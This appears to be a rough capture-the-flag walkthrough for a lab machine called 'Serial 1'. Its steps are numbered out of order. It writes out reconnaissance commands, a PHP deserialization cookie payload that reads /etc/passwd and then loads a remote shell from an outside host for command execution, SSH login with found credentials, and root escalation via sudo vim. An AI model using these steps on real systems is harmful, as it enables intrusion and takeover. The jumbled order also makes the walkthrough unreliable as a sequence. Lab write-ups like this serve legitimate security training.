Serial 1
28.check file contents
30.class.php
31.log.class.php
32.add echo base64_encode(serialize(new User('admin')));
29.index.php
(2) Enumeration
8 Browsing website
9.Browsed the website on port 80
10.Got message that sk4 is beta test for cookie handler
42.tried base64 encoded value on webpage
Burp Suite
intercepted request
13.set target
14 provide base64 encoded value
decode
16.username given by value
17.do not change anything
43.got passwd file, shows vulnerability
(3).Exploitation and analysis
34.php user.class.php
49 ,41.again
33.run php code
35.gedit
39.user class
echo base64_encode(serialize(new User('admin')));
40.edit new log
36.log.class.php
37.give variable path
38./etc/passwd
47.edit change path as url of shell
48."http://192.168.2.3/shell.php"
(1). Penetration Methodology
2 Scanning
3.Nmap
nmap -sn 10.0.2.1/24 to find IP of victim
5.ip is 10.0.2.9
nmap 10.0.2.9 to find open ports
7.found http 80, ssh 22 ports open
18.Dirb
19.tried to get in directories
20.dirb
http://10.0.2.9
21.got backup directory
23.visited backup dir on webserver
24.found bak.zip
download zip
26.wget
http://10.0.2.9/backup/bak.zip
27.unzip bak.zip
44.remote code execution file
45.nano shell.php
46.start python server
50.cmd parameter with ifconfig command.
51.found a file named credentials.txt.bak
52.use credentials
53.find first flag
54.ssh
sk4@10.0.2.9
enter password
got access to serial
55.cat flag.txt
(4).Escalation
56.permissions
sudo vim
:!/bin/bash
sudo -l
cd /root
cat flag.txt
got it :red_flag: